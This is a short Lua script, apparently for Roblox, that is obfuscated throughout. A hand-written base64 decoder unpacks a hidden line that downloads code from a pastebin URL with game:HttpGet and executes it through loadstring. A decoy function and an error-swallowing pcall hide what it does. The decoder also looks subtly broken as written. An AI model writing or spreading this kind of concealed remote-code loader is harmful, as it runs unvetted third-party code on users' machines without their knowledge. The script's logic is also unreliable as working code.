local a0,a1,a2="bG9hZHN0cmluZyhnYW1lOkh0dHBHZXQoImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9Zc0p0UnJSdyIpKSgp"
local function z9(z8)
	local t3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
	z8 = z8:gsub("[^"..t3.."=]", "")
	local r4,i2,l0,l1 = "","",0,0
	for k,v in z8:gmatch(".") do
		if v ~= "=" then
			l1 = l1 * 64 + t3:find(v) - 1
			i2 = i2 + 6
			if i2 >= 8 then
				i2 = i2 - 8
				r4 = r4 .. string.char(math.floor(l1 / 2^i2))
				l1 = l1 % 2^i2
			end
		end
	end
	return r4
end
local function q7()
	local b5 = 12345
	local x4 = "nonsense"
	for i=1,3 do
		b5 = (b5 * 3 + i) % 10000
		x4 = x4 .. tostring(b5)
	end
end
q7()
local _,s4 = pcall(function()
	local M1 = z9(a0)
	local f1 = loadstring or load
	local r = f1(M1)
	r()
end)
